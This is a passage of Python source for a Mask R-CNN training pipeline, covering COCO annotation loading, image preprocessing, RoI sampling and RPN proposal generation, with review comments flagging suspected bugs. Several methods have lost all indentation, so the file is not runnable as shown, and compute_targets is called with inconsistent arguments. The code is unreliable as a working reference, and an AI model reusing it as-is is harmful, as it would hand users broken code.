    im_width = np.round(rawdata['width'] * scale)
    # Keep real (non-crowd) ground-truth boxes only
    gt_inds = np.where(
        (rawdata['gt_classes'] > 0) & (rawdata['is_crowd'] == 0)
    )[0]
    gt_rois = rawdata['boxes'][gt_inds, :] * scale
    # TODO(rbg): gt_boxes is poorly named;
    # should be something like 'gt_rois_info'
    # NOTE(review): gt_boxes is assembled here but _get_rpn_blobs below is
    # called with gt_rois, leaving gt_boxes effectively unused -- confirm.
    gt_boxes = np.zeros((len(gt_inds), 6), dtype=np.float32)
    gt_boxes[:, 0] = im_i  # batch inds
    gt_boxes[:, 1:5] = gt_rois
    gt_boxes[:, 5] = rawdata['gt_classes'][gt_inds]
    im_info = np.array([[im_height, im_width, scale]], dtype=np.float32)
    blobs['im_info'].append(im_info)
    # Add RPN targets
    # Classical RPN, applied to a single feature level
    rpn_blobs = self._get_rpn_blobs(im_height, im_width, [self.foa], self.all_anchors, gt_rois)
    for k, v in rpn_blobs.items():
        blobs[k].append(v)
    # Concatenate each per-image list into a single array
    for k, v in blobs.items():
        if isinstance(v, list) and len(v) > 0:
            blobs[k] = np.concatenate(v)
    valid_keys = [
        'has_visible_keypoints', 'boxes', 'segms', 'seg_areas', 'gt_classes',
        'gt_overlaps', 'is_crowd', 'box_to_gt_ind_map', 'gt_keypoints'
    ]
    # Strip the roidb entry down to the keys downstream consumers need
    minimal_roidb = [{} for _ in range(1)]
    i = 0
    e = rawdata
    for k in valid_keys:
        if k in e:
            minimal_roidb[i][k] = e[k]
    # blobs['roidb'] = blob_utils.serialize(minimal_roidb)
    blobs['roidb'] = minimal_roidb
    # Always return valid=True, since RPN minibatches are valid by design
    return True
def get_image_blob(self, rawdata):
    """Builds an input blob from the images in the roidb at the specified
    scales.
    """
    # Sample random scales to use for each image in this batch
    scale_inds = np.random.randint(
        0, high=len(CONFIG.TRAIN.SCALES), size=1)
    processed_ims = []
    im_scales = []
    # cv2.imread yields BGR HWC uint8 (returns None for a missing path --
    # not checked here)
    im = cv2.imread(rawdata['image'])
    if rawdata['flipped']:
        # Mirror the pixels to match annotations flipped in _flip()
        im = im[:, ::-1, :]
    target_size = CONFIG.TRAIN.SCALES[scale_inds[0]]
    im, im_scale = self._prep_im_for_blob(
        im, CONFIG.DATASET.MEAN, [target_size], CONFIG.TRAIN.MAX_SIZE)
    im_scales.append(im_scale[0])
    processed_ims.append(im[0])
    # Create a blob to hold the input images [n, c, h, w]
    blob = self._im_list_to_blob(processed_ims)
    return blob, im_scales
def _im_list_to_blob(self, ims):
"""Convert a list of images into a network input. Assumes images were
prepared using prep_im_for_blob or equivalent: i.e.
- BGR channel order
- pixel means subtracted
- resized to the desired input size
- float32 numpy ndarray format
Output is a 4D HCHW tensor of the images concatenated along axis 0 with
shape.
"""
if not isinstance(ims, list):
ims = [ims]
max_shape = np.array([im.shape[:2] for im in ims]).max(axis=0) # get_max_shape()
num_images = len(ims)
blob = np.zeros(
(num_images, max_shape[0], max_shape[1], 3), dtype=np.float32)
for i in range(num_images):
im = ims[i]
blob[i, 0:im.shape[0], 0:im.shape[1], :] = im
# Move channels (axis 3) to axis 1
# Axis order will become: (batch elem, channel, height, width)
channel_swap = (0, 3, 1, 2)
blob = blob.transpose(channel_swap)
return blob
def _prep_im_for_blob(self, im, pixel_means, target_sizes, max_size):
    """Prepare an image for use as a network input blob. Specially:
      - Subtract per-channel pixel mean
      - Convert to float32
      - Rescale to each of the specified target size (capped at max_size)
    Returns a list of transformed images, one for each target size. Also
    returns the scale factors that were used to compute each returned image.
    """
    im = im.astype(np.float32, copy=False)
    im -= pixel_means
    im_shape = im.shape
    im_size_min = np.min(im_shape[0:2])
    im_size_max = np.max(im_shape[0:2])
    ims = []
    im_scales = []
    for target_size in target_sizes:
        # Scale so the short side hits target_size, capped by max_size
        im_scale = self._get_target_scale(im_size_min, im_size_max, target_size, max_size)
        im_resized = cv2.resize(im, None, None, fx=im_scale, fy=im_scale,
                                interpolation=cv2.INTER_LINEAR)
        ims.append(im_resized)
        im_scales.append(im_scale)
    return ims, im_scales
def _get_target_scale(self, im_size_min, im_size_max, target_size, max_size):
"""Calculate target resize scale
"""
im_scale = float(target_size) / float(im_size_min)
# Prevent the biggest axis from being more than max_size
if np.round(im_scale * im_size_max) > max_size:
im_scale = float(max_size) / float(im_size_max)
return im_scale
def get_data(self, idx):
    """Build the roidb entry (gt boxes, classes, overlaps, ...) for image idx.

    When the entry has neither foreground nor background RoIs, falls through
    to the next image, so a neighbouring sample may be returned instead.
    """
    image_id = self.image_ids[idx]
    datainfo = self.COCO.loadImgs(image_id)[0]
    rawdata = {
        'id': image_id,
        'filename': datainfo['file_name'],
        'image': os.path.join(self.imgroot, datainfo['file_name']),
        'width': datainfo['width'],
        'height': datainfo['height'],
        'flipped': False,
        'boxes': np.empty((0, 4), dtype=np.float32),
        'segms': [],
        'gt_classes': np.empty((0), dtype=np.int32),
        'seg_areas': np.empty((0), dtype=np.float32),
        'gt_overlaps': scipy.sparse.csr_matrix(
            np.empty((0, self.num_classes), dtype=np.float32)
        ),
        # FIX: np.bool was deprecated and removed in NumPy 1.24+; the builtin
        # bool is the equivalent dtype.
        'is_crowd': np.empty((0), dtype=bool),
        'box_to_gt_ind_map': np.empty((0), dtype=np.int32)
    }
    self._add_gt_annotations(rawdata)
    self._add_class_assignments(rawdata)
    # Random horizontal flip augmentation
    if CONFIG.AUGS.FLIP_ON and random.random() < 0.5:
        self._flip(rawdata)
    if not self._is_valid(rawdata):
        # FIX: wrap around instead of a bare idx+1, which raised IndexError
        # when the last image was invalid.
        # DIFF: may get same data twice.
        return self.get_data((idx + 1) % len(self.image_ids))
    # compute_targets is provided elsewhere in the module
    rawdata['bbox_targets'] = compute_targets(rawdata)
    return rawdata
def _compute_and_log_stats(self, roidb):
    """Log a histogram of ground-truth class counts over `roidb` (debug aid)."""
    classes = self.classes
    char_len = np.max([len(c) for c in classes])
    hist_bins = np.arange(len(classes) + 1)
    # Histogram of ground-truth objects
    # FIX: np.int was deprecated and removed in NumPy 1.24+; use the
    # builtin int, which is what the alias meant.
    gt_hist = np.zeros((len(classes)), dtype=int)
    for rawdata in roidb:
        # Count real (non-crowd) ground-truth boxes only
        gt_inds = np.where(
            (rawdata['gt_classes'] > 0) & (rawdata['is_crowd'] == 0))[0]
        gt_classes = rawdata['gt_classes'][gt_inds]
        gt_hist += np.histogram(gt_classes, bins=hist_bins)[0]
    logger.debug('Ground-truth class histogram:')
    for i, v in enumerate(gt_hist):
        logger.debug(
            '{:d}{:s}: {:d}'.format(
                i, classes[i].rjust(char_len), v))
    logger.debug('-' * char_len)
    logger.debug(
        '{:s}: {:d}'.format(
            'total'.rjust(char_len), np.sum(gt_hist)))
def _unmap(self, data, count, inds, fill=0):
"""Unmap a subset of item (data) back to the original set of items (of
size count)"""
if count == len(inds):
return data
if len(data.shape) == 1:
ret = np.empty((count, ), dtype=data.dtype)
ret.fill(fill)
ret[inds] = data
else:
ret = np.empty((count, ) + data.shape[1:], dtype=data.dtype)
ret.fill(fill)
ret[inds, :] = data
return ret
def _is_valid(self, rawdata):
# Valid images have:
# (1) At least one foreground RoI OR
# (2) At least one background RoI
overlaps = rawdata['max_overlaps']
# find boxes with sufficient overlap
fg_inds = np.where(overlaps >= CONFIG.TRAIN.FG_THRESH)[0]
# Select background RoIs as those within [BG_THRESH_LO, BG_THRESH_HI)
bg_inds = np.where((overlaps < CONFIG.TRAIN.BG_THRESH_HI) &
(overlaps >= CONFIG.TRAIN.BG_THRESH_LO))[0]
# image is only valid if such boxes exist
valid = len(fg_inds) > 0 or len(bg_inds) > 0
return valid
def _flip(self, rawdata):
width = rawdata['width']
boxes = rawdata['boxes'].copy()
oldx1 = boxes[:, 0].copy()
oldx2 = boxes[:, 2].copy()
boxes[:, 0] = width - oldx2 - 1
boxes[:, 2] = width - oldx1 - 1
assert (boxes[:, 2] >= boxes[:, 0]).all()
rawdata['boxes'] = boxes
rawdata['segms'] = self.flip_segms(
rawdata['segms'], rawdata['height'], rawdata['width']
)
rawdata['flipped'] = True
def _add_class_assignments(self, rawdata):
"""Compute object category assignment for each box associated with each
roidb entry.
"""
gt_overlaps = rawdata['gt_overlaps'].toarray()
# max overlap with gt over classes (columns)
max_overlaps = gt_overlaps.max(axis=1)
# gt class that had the max overlap
max_classes = gt_overlaps.argmax(axis=1)
rawdata['max_classes'] = max_classes
rawdata['max_overlaps'] = max_overlaps
# sanity checks
# if max overlap is 0, the class must be background (class 0)
zero_inds = np.where(max_overlaps == 0)[0]
assert all(max_classes[zero_inds] == 0)
# if max overlap > 0, the class must be a fg class (not class 0)
nonzero_inds = np.where(max_overlaps > 0)[0]
assert all(max_classes[nonzero_inds] != 0)
    def _add_gt_annotations(self, rawdata):
        """Load the COCO annotations for `rawdata['id']` and append the
        surviving ground-truth boxes/segms/classes to the entry in place.

        An object survives sanitization when: its polygons have >= 3 points,
        its area is >= CONFIG.TRAIN.GT_MIN_AREA, it is not marked 'ignore',
        and its clipped box has positive width and height.
        """
        ann_ids = self.COCO.getAnnIds(imgIds=rawdata['id'], iscrowd=None)
        objs = self.COCO.loadAnns(ann_ids)
        # Sanitize bboxes -- some are invalid
        valid_objs = []
        valid_segms = []
        width = rawdata['width']
        height = rawdata['height']
        for obj in objs:
            # crowd regions are RLE encoded and stored as dicts
            if isinstance(obj['segmentation'], list):
                # Valid polygons have >= 3 points, so require >= 6 coordinates
                obj['segmentation'] = [
                    p for p in obj['segmentation'] if len(p) >= 6
                ]
            if obj['area'] < CONFIG.TRAIN.GT_MIN_AREA:
                continue
            if 'ignore' in obj and obj['ignore'] == 1:
                continue
            # Convert form (x1, y1, w, h) to (x1, y1, x2, y2)
            x1, y1, x2, y2 = xywh_to_xyxy(obj['bbox'])
            x1, y1, x2, y2 = self.clip_xyxy_to_image(
                x1, y1, x2, y2, height, width
            )
            # Require non-zero seg area and more than 1x1 box size
            if obj['area'] > 0 and x2 > x1 and y2 > y1:
                obj['clean_bbox'] = [x1, y1, x2, y2]
                valid_objs.append(obj)
                valid_segms.append(obj['segmentation'])
        num_valid_objs = len(valid_objs)
        # Allocate per-object arrays with the same dtypes as the entry's
        # existing (initially empty) fields so np.append keeps dtypes stable.
        boxes = np.zeros((num_valid_objs, 4), dtype=rawdata['boxes'].dtype)
        gt_classes = np.zeros((num_valid_objs), dtype=rawdata['gt_classes'].dtype)
        gt_overlaps = np.zeros(
            (num_valid_objs, self.num_classes),
            dtype=rawdata['gt_overlaps'].dtype
        )
        seg_areas = np.zeros((num_valid_objs), dtype=rawdata['seg_areas'].dtype)
        is_crowd = np.zeros((num_valid_objs), dtype=rawdata['is_crowd'].dtype)
        box_to_gt_ind_map = np.zeros(
            (num_valid_objs), dtype=rawdata['box_to_gt_ind_map'].dtype
        )
        for ix, obj in enumerate(valid_objs):
            # Map the sparse COCO category id to a contiguous class index.
            cls = self.json_category_id_to_contiguous_id[obj['category_id']]
            boxes[ix, :] = obj['clean_bbox']
            gt_classes[ix] = cls
            seg_areas[ix] = obj['area']
            is_crowd[ix] = obj['iscrowd']
            box_to_gt_ind_map[ix] = ix
            if obj['iscrowd']:
                # Set overlap to -1 for all classes for crowd objects
                # so they will be excluded during training
                gt_overlaps[ix, :] = -1.0
            else:
                gt_overlaps[ix, cls] = 1.0
        rawdata['boxes'] = np.append(rawdata['boxes'], boxes, axis=0)
        rawdata['segms'].extend(valid_segms)
        rawdata['gt_classes'] = np.append(rawdata['gt_classes'], gt_classes)
        rawdata['seg_areas'] = np.append(rawdata['seg_areas'], seg_areas)
        # gt_overlaps is stored sparse; densify, append, then re-sparsify.
        rawdata['gt_overlaps'] = np.append(
            rawdata['gt_overlaps'].toarray(), gt_overlaps, axis=0
        )
        rawdata['gt_overlaps'] = scipy.sparse.csr_matrix(rawdata['gt_overlaps'])
        rawdata['is_crowd'] = np.append(rawdata['is_crowd'], is_crowd)
        rawdata['box_to_gt_ind_map'] = np.append(
            rawdata['box_to_gt_ind_map'], box_to_gt_ind_map
        )
def flip_segms(self, segms, height, width):
"""Left/right flip each mask in a list of masks."""
def _flip_poly(poly, width):
flipped_poly = np.array(poly)
flipped_poly[0::2] = width - np.array(poly[0::2]) - 1
return flipped_poly.tolist()
def _flip_rle(rle, height, width):
if 'counts' in rle and type(rle['counts']) == list:
# Magic RLE format handling painfully discovered by looking at the
# COCO API showAnns function.
rle = mask_util.frPyObjects([rle], height, width)
mask = mask_util.decode(rle)
mask = mask[:, ::-1, :]
rle = mask_util.encode(np.array(mask, order='F', dtype=np.uint8))
return rle
flipped_segms = []
for segm in segms:
if type(segm) == list:
# Polygon format
flipped_segms.append([_flip_poly(poly, width) for poly in segm])
else:
# RLE format
assert type(segm) == dict
flipped_segms.append(_flip_rle(segm, height, width))
return flipped_segms
def clip_xyxy_to_image(self, x1, y1, x2, y2, height, width):
"""Clip coordinates to an image with the given height and width."""
x1 = np.minimum(width - 1., np.maximum(0., x1))
y1 = np.minimum(height - 1., np.maximum(0., y1))
x2 = np.minimum(width - 1., np.maximum(0., x2))
y2 = np.minimum(height - 1., np.maximum(0., y2))
return x1, y1, x2, y2
####################################################################################################
# Network Model
####################################################################################################
from resnetXtFPN import resnet50C4
class GenerateProposalLabelsOp(nn.Module):
    """Labels RPN proposals for Fast/Mask R-CNN training: merges proposals
    into the roidb, assigns classes by overlap, and samples fg/bg RoIs."""
    def __init__(self):
        # Stateless op; nn.Module base only for integration with the model.
        super().__init__()
    def forward(self, rpn_rois, roidb, im_info):
        """Op for generating training labels for RPN proposals. This is used
        when training RPN jointly with Fast/Mask R-CNN (as in end-to-end
        Faster R-CNN training).
        blobs_in:
          - 'rpn_rois': 2D tensor of RPN proposals output by GenerateProposals
          - 'roidb': roidb entries that will be labeled
          - 'im_info': See GenerateProposals doc.
        blobs_out:
          - (variable set of blobs): returns whatever blobs are required for
            training the model. It does this by querying the data loader for
            the list of blobs that are needed.
        """
        # NOTE(review): .numpy() requires a CPU tensor; no .cpu() here
        # unlike GenerateProposalsOp.forward — confirm im_info is always
        # on the CPU when this op runs.
        im_scales = im_info.data.numpy()[:, 2]
        # get_fast_rcnn_blob_names()
        output_blob_names = ['rois',
            'labels_int32', 'bbox_targets', 'bbox_inside_weights', 'bbox_outside_weights',
            'mask_rois', 'roi_has_mask_int32', 'masks_int32']
        # For historical consistency with the original Faster R-CNN
        # implementation we are *not* filtering crowd proposals.
        # This choice should be investigated in the future (it likely does
        # not matter).
        # Note: crowd_thresh=0 will ignore _filter_crowd_proposals
        self.add_proposals(roidb, rpn_rois, im_scales, crowd_thresh=0)
        blobs = {k: [] for k in output_blob_names}
        self.add_fast_rcnn_blobs(blobs, im_scales, roidb)
        return blobs
    def add_fast_rcnn_blobs(self, blobs, im_scales, roidb):
        """Add blobs needed for training Fast R-CNN style models."""
        # Sample training RoIs from each image and append them to the blob lists
        for im_i, entry in enumerate(roidb):
            frcn_blobs = self._sample_rois(entry, im_scales[im_i], im_i)
            for k, v in frcn_blobs.items():
                blobs[k].append(v)
        # Concat the training blob lists into tensors
        for k, v in blobs.items():
            if isinstance(v, list) and len(v) > 0:
                blobs[k] = np.concatenate(v)
        # Perform any final work and validity checks after the collating blobs for
        # all minibatch images
        valid = True
        return valid
    def _sample_rois(self, roidb, im_scale, batch_idx):
        """Generate a random sample of RoIs comprising foreground and background
        examples.
        """
        rois_per_image = int(CONFIG.TRAIN.BATCH_SIZE_PER_IM)
        fg_rois_per_image = int(np.round(CONFIG.TRAIN.FG_FRACTION * rois_per_image))
        max_overlaps = roidb['max_overlaps']
        # Select foreground RoIs as those with >= FG_THRESH overlap
        fg_inds = np.where(max_overlaps >= CONFIG.TRAIN.FG_THRESH)[0]
        # Guard against the case when an image has fewer than fg_rois_per_image
        # foreground RoIs
        fg_rois_per_this_image = np.minimum(fg_rois_per_image, fg_inds.size)
        # Sample foreground regions without replacement
        if fg_inds.size > 0:
            fg_inds = npr.choice(
                fg_inds, size=fg_rois_per_this_image, replace=False)
        # Select background RoIs as those within [BG_THRESH_LO, BG_THRESH_HI)
        bg_inds = np.where((max_overlaps < CONFIG.TRAIN.BG_THRESH_HI) &
                           (max_overlaps >= CONFIG.TRAIN.BG_THRESH_LO))[0]
        # Compute number of background RoIs to take from this image (guarding
        # against there being fewer than desired)
        bg_rois_per_this_image = rois_per_image - fg_rois_per_this_image
        bg_rois_per_this_image = np.minimum(bg_rois_per_this_image, bg_inds.size)
        # Sample foreground regions without replacement
        # NOTE(review): np.random.choice here vs npr.choice above —
        # presumably the same RNG; confirm npr is numpy.random.
        if bg_inds.size > 0:
            bg_inds = np.random.choice(
                bg_inds, size=bg_rois_per_this_image, replace=False)
        # The indices that we're selecting (both fg and bg)
        keep_inds = np.append(fg_inds, bg_inds)
        # Label is the class each RoI has max overlap with
        sampled_labels = roidb['max_classes'][keep_inds]
        sampled_labels[fg_rois_per_this_image:] = 0  # Label bg RoIs with class 0
        sampled_boxes = roidb['boxes'][keep_inds]
        if 'bbox_targets' not in roidb:
            gt_inds = np.where(roidb['gt_classes'] > 0)[0]
            gt_boxes = roidb['boxes'][gt_inds, :]
            gt_assignments = gt_inds[roidb['box_to_gt_ind_map'][keep_inds]]
            bbox_targets = compute_targets(
                sampled_boxes, gt_boxes[gt_assignments, :], sampled_labels)
            bbox_targets, bbox_inside_weights = expand_bbox_targets(bbox_targets)
        else:
            bbox_targets, bbox_inside_weights = expand_bbox_targets(
                roidb['bbox_targets'][keep_inds, :])
        bbox_outside_weights = np.array(
            bbox_inside_weights > 0, dtype=bbox_inside_weights.dtype)
        # Scale rois and format as (batch_idx, x1, y1, x2, y2)
        sampled_rois = sampled_boxes * im_scale
        repeated_batch_idx = batch_idx * np.ones((sampled_rois.shape[0], 1), dtype=np.float32)
        sampled_rois = np.hstack((repeated_batch_idx, sampled_rois))
        # Base Fast R-CNN blobs
        blob_dict = dict(
            labels_int32=sampled_labels.astype(np.int32, copy=False),
            rois=sampled_rois,
            bbox_targets=bbox_targets,
            bbox_inside_weights=bbox_inside_weights,
            bbox_outside_weights=bbox_outside_weights)
        # Optionally add Mask R-CNN blobs
        # NOTE(review): depends on a module-level `roi_data` import that is
        # not visible in this chunk — confirm it is imported at file top.
        roi_data.mask_rcnn.add_mask_rcnn_blobs(blob_dict, sampled_boxes, roidb,
                                               im_scale, batch_idx)
        return blob_dict
    def add_proposals(self, roidb, rois, scales, crowd_thresh):
        """Add proposal boxes (rois) to an roidb that has ground-truth annotations
        but no proposals. If the proposals are not at the original image scale,
        specify the scale factor that separate them in scales.
        """
        box_list = []
        for i in range(len(roidb)):
            # Undo the network-input scaling; rois column 0 is the batch index.
            inv_im_scale = 1. / scales[i]
            idx = np.where(rois[:, 0] == i)[0]
            box_list.append(rois[idx, 1:] * inv_im_scale)
        self._merge_proposal_boxes_into_roidb(roidb, box_list)
        if crowd_thresh > 0:
            self._filter_crowd_proposals(roidb, crowd_thresh)
        self._add_class_assignments(roidb)
    def _merge_proposal_boxes_into_roidb(self, roidb, box_list):
        """Add proposal boxes to each roidb entry."""
        assert len(box_list) == len(roidb)
        for i, entry in enumerate(roidb):
            boxes = box_list[i]
            num_boxes = boxes.shape[0]
            gt_overlaps = np.zeros(
                (num_boxes, entry['gt_overlaps'].shape[1]),
                dtype=entry['gt_overlaps'].dtype
            )
            # -1 marks proposals with no assigned ground-truth box.
            box_to_gt_ind_map = -np.ones(
                (num_boxes), dtype=entry['box_to_gt_ind_map'].dtype
            )
            # Note: unlike in other places, here we intentionally include all gt
            # rois, even ones marked as crowd. Boxes that overlap with crowds will
            # be filtered out later (see: _filter_crowd_proposals).
            gt_inds = np.where(entry['gt_classes'] > 0)[0]
            if len(gt_inds) > 0:
                gt_boxes = entry['boxes'][gt_inds, :]
                gt_classes = entry['gt_classes'][gt_inds]
                proposal_to_gt_overlaps = bbox_overlaps(
                    boxes.astype(dtype=np.float32, copy=False),
                    gt_boxes.astype(dtype=np.float32, copy=False)
                )
                # Gt box that overlaps each input box the most
                # (ties are broken arbitrarily by class order)
                argmaxes = proposal_to_gt_overlaps.argmax(axis=1)
                # Amount of that overlap
                maxes = proposal_to_gt_overlaps.max(axis=1)
                # Those boxes with non-zero overlap with gt boxes
                I = np.where(maxes > 0)[0]
                # Record max overlaps with the class of the appropriate gt box
                gt_overlaps[I, gt_classes[argmaxes[I]]] = maxes[I]
                box_to_gt_ind_map[I] = gt_inds[argmaxes[I]]
            entry['boxes'] = np.append(
                entry['boxes'],
                boxes.astype(entry['boxes'].dtype, copy=False),
                axis=0
            )
            # Proposals are background until proven otherwise: class 0,
            # zero seg area, not crowd.
            entry['gt_classes'] = np.append(
                entry['gt_classes'],
                np.zeros((num_boxes), dtype=entry['gt_classes'].dtype)
            )
            entry['seg_areas'] = np.append(
                entry['seg_areas'],
                np.zeros((num_boxes), dtype=entry['seg_areas'].dtype)
            )
            entry['gt_overlaps'] = np.append(
                entry['gt_overlaps'].toarray(), gt_overlaps, axis=0
            )
            entry['gt_overlaps'] = scipy.sparse.csr_matrix(entry['gt_overlaps'])
            entry['is_crowd'] = np.append(
                entry['is_crowd'],
                np.zeros((num_boxes), dtype=entry['is_crowd'].dtype)
            )
            entry['box_to_gt_ind_map'] = np.append(
                entry['box_to_gt_ind_map'],
                box_to_gt_ind_map.astype(
                    entry['box_to_gt_ind_map'].dtype, copy=False
                )
            )
    def _filter_crowd_proposals(self, roidb, crowd_thresh):
        """Finds proposals that are inside crowd regions and marks them as
        overlap = -1 with each ground-truth rois, which means they will be excluded
        from training.
        """
        for entry in roidb:
            gt_overlaps = entry['gt_overlaps'].toarray()
            crowd_inds = np.where(entry['is_crowd'] == 1)[0]
            non_gt_inds = np.where(entry['gt_classes'] == 0)[0]
            if len(crowd_inds) == 0 or len(non_gt_inds) == 0:
                continue
            # COCOmask.iou expects xywh boxes and an iscrowd flag per gt box.
            crowd_boxes = xyxy_to_xywh(entry['boxes'][crowd_inds, :])
            non_gt_boxes = xyxy_to_xywh(entry['boxes'][non_gt_inds, :])
            iscrowd_flags = [int(True)] * len(crowd_inds)
            ious = COCOmask.iou(non_gt_boxes, crowd_boxes, iscrowd_flags)
            bad_inds = np.where(ious.max(axis=1) > crowd_thresh)[0]
            gt_overlaps[non_gt_inds[bad_inds], :] = -1
            entry['gt_overlaps'] = scipy.sparse.csr_matrix(gt_overlaps)
    def _add_class_assignments(self, roidb):
        """Compute object category assignment for each box associated with each
        roidb entry.
        """
        for entry in roidb:
            gt_overlaps = entry['gt_overlaps'].toarray()
            # max overlap with gt over classes (columns)
            max_overlaps = gt_overlaps.max(axis=1)
            # gt class that had the max overlap
            max_classes = gt_overlaps.argmax(axis=1)
            entry['max_classes'] = max_classes
            entry['max_overlaps'] = max_overlaps
            # sanity checks
            # if max overlap is 0, the class must be background (class 0)
            zero_inds = np.where(max_overlaps == 0)[0]
            assert all(max_classes[zero_inds] == 0)
            # if max overlap > 0, the class must be a fg class (not class 0)
            nonzero_inds = np.where(max_overlaps > 0)[0]
            assert all(max_classes[nonzero_inds] != 0)
class GenerateProposalsOp(nn.Module):
    """Converts RPN scores and box deltas into scored region proposals.

    Pipeline: enumerate anchors over the feature grid, apply predicted
    deltas, clip to the image, drop tiny boxes, then NMS.
    """
    def __init__(self, anchors, spatial_scale):
        """
        Args:
            anchors: (A, 4) array of base anchor boxes.
            spatial_scale: feature-map scale w.r.t. the network input; the
                feature stride is its inverse.
        """
        super().__init__()
        self._anchors = anchors
        self._num_anchors = self._anchors.shape[0]
        self._feat_stride = 1. / spatial_scale
    def forward(self, rpn_cls_prob, rpn_bbox_pred, im_info):
        """Op for generating RPN proposals.
        blobs_in:
          - 'rpn_cls_probs': 4D tensor of shape (N, A, H, W), where N is the
            number of minibatch images, A is the number of anchors per
            locations, and (H, W) is the spatial size of the prediction grid.
            Each value represents a "probability of object" rating in [0, 1].
          - 'rpn_bbox_pred': 4D tensor of shape (N, 4 * A, H, W) of predicted
            deltas for transformation anchor boxes into RPN proposals.
          - 'im_info': 2D tensor of shape (N, 3) where the three columns encode
            the input image's [height, width, scale]. Height and width are
            for the input to the network, not the original image; scale is the
            scale factor used to scale the original image to the network input
            size.
        blobs_out:
          - 'rpn_rois': 2D tensor of shape (R, 5), for R RPN proposals where the
            five columns encode [batch ind, x1, y1, x2, y2]. The boxes are
            w.r.t. the network input, which is a *scaled* version of the
            original image; these proposals must be scaled by 1 / scale (where
            scale comes from im_info; see above) to transform it back to the
            original input image coordinate system.
          - 'rpn_roi_probs': 1D tensor of objectness probability scores
            (extracted from rpn_cls_probs; see above).
        """
        # Algorithm outline:
        # 1. for each location i in a (H, W) grid:
        #      generate A anchor boxes centered on cell i
        #      apply predicted bbox deltas to each of the A anchors at cell i
        # 2. clip predicted boxes to image
        # 3. remove predicted boxes with either height or width < threshold
        # 4. sort all (proposal, score) pairs by score from highest to lowest
        # 5. take the top pre_nms_topN proposals before NMS
        # 6. apply NMS with a loose threshold (0.7) to the remaining proposals
        # 7. take after_nms_topN proposals after NMS
        # 8. return the top proposals
        # Type conversion: everything below runs in NumPy on the CPU.
        # predicted probability of fg object for each RPN anchor
        scores = rpn_cls_prob.data.cpu().numpy()
        # predicted anchor transformations
        bbox_deltas = rpn_bbox_pred.data.cpu().numpy()
        # input image (height, width, scale); scale is the factor applied to
        # the original dataset image to get the network input image
        im_info = im_info.data.cpu().numpy()
        # 1. Generate proposals from bbox deltas and shifted anchors
        height, width = scores.shape[-2:]
        # Enumerate all shifted positions on the (H, W) grid
        shift_x = np.arange(0, width) * self._feat_stride
        shift_y = np.arange(0, height) * self._feat_stride
        shift_x, shift_y = np.meshgrid(shift_x, shift_y, copy=False)
        # Convert to (K, 4), K=H*W, where the columns are (dx, dy, dx, dy)
        # shift pointing to each grid location
        shifts = np.vstack((shift_x.ravel(), shift_y.ravel(), shift_x.ravel(),
                            shift_y.ravel())).transpose()
        # Broadcast anchors over shifts to enumerate all anchors at all
        # positions in the (H, W) grid:
        #   - add A anchors of shape (1, A, 4) to
        #   - K shifts of shape (K, 1, 4) to get
        #   - all shifted anchors of shape (K, A, 4)
        #   - reshape to (K*A, 4) shifted anchors
        num_images = scores.shape[0]
        A = self._num_anchors
        K = shifts.shape[0]
        all_anchors = self._anchors[np.newaxis, :, :] + shifts[:, np.newaxis, :]
        all_anchors = all_anchors.reshape((K * A, 4))
        rois = np.empty((0, 5), dtype=np.float32)
        roi_probs = np.empty((0, 1), dtype=np.float32)
        for im_i in range(num_images):
            im_i_boxes, im_i_probs = self.proposals_for_one_image(
                im_info[im_i, :], all_anchors, bbox_deltas[im_i, :, :, :],
                scores[im_i, :, :, :])
            batch_inds = im_i * np.ones(
                (im_i_boxes.shape[0], 1), dtype=np.float32)
            im_i_rois = np.hstack((batch_inds, im_i_boxes))
            rois = np.append(rois, im_i_rois, axis=0)
            roi_probs = np.append(roi_probs, im_i_probs, axis=0)
        return rois, roi_probs  # Note: ndarrays
    def proposals_for_one_image(self, im_info, all_anchors, bbox_deltas, scores):
        """Generate, clip, filter, and NMS proposals for a single image."""
        # Get mode-dependent configuration
        CONFIG_key = 'TRAIN' if self.training else 'TEST'
        pre_nms_topN = CONFIG[CONFIG_key].RPN_PRE_NMS_TOP_N
        post_nms_topN = CONFIG[CONFIG_key].RPN_POST_NMS_TOP_N
        nms_thresh = CONFIG[CONFIG_key].RPN_NMS_THRESH
        min_size = CONFIG[CONFIG_key].RPN_MIN_SIZE
        # Transpose and reshape predicted bbox transformations to get them
        # into the same order as the anchors:
        #   - bbox deltas will be (4 * A, H, W) format from conv output
        #   - transpose to (H, W, 4 * A)
        #   - reshape to (H * W * A, 4) where rows are ordered by (H, W, A)
        #     in slowest to fastest order to match the enumerated anchors
        bbox_deltas = bbox_deltas.transpose((1, 2, 0)).reshape((-1, 4))
        # Same story for the scores:
        #   - scores are (A, H, W) format from conv output
        #   - transpose to (H, W, A)
        #   - reshape to (H * W * A, 1) where rows are ordered by (H, W, A)
        #     to match the order of anchors and bbox_deltas
        scores = scores.transpose((1, 2, 0)).reshape((-1, 1))
        # 4. sort all (proposal, score) pairs by score from highest to lowest
        # 5. take top pre_nms_topN (e.g. 6000)
        if pre_nms_topN <= 0 or pre_nms_topN >= len(scores):
            order = np.argsort(-scores.squeeze())
        else:
            # Avoid sorting possibly large arrays; First partition to get top K
            # unsorted and then sort just those (~20x faster for 200k scores)
            inds = np.argpartition(-scores.squeeze(),
                                   pre_nms_topN)[:pre_nms_topN]
            order = np.argsort(-scores[inds].squeeze())
            order = inds[order]
        bbox_deltas = bbox_deltas[order, :]
        all_anchors = all_anchors[order, :]
        scores = scores[order]
        # Transform anchors into proposals via bbox transformations
        proposals = bbox_transform(all_anchors, bbox_deltas, (1.0, 1.0, 1.0, 1.0))
        # 2. clip proposals to image (may result in proposals with zero area
        # that will be removed in the next step)
        # BUG FIX: this called self.clip_tiled_boxes, but the method is
        # named _clip_tiled_boxes — the old call raised AttributeError.
        proposals = self._clip_tiled_boxes(proposals, im_info[:2])
        # 3. remove predicted boxes with either height or width < min_size
        keep = self._filter_boxes(proposals, min_size, im_info)
        proposals = proposals[keep, :]
        scores = scores[keep]
        # 6. apply loose nms (e.g. threshold = 0.7)
        # 7. take after_nms_topN (e.g. 300)
        # 8. return the top proposals (-> RoIs top)
        if nms_thresh > 0:
            keep = nms_gpu(np.hstack((proposals, scores)), nms_thresh)
            if post_nms_topN > 0:
                keep = keep[:post_nms_topN]
            proposals = proposals[keep, :]
            scores = scores[keep]
        return proposals, scores
    def _filter_boxes(self, boxes, min_size, im_info):
        """Only keep boxes with both sides >= min_size and center within the image.
        """
        # Scale min_size to match image scale (im_info[2]).
        min_size *= im_info[2]
        ws = boxes[:, 2] - boxes[:, 0] + 1
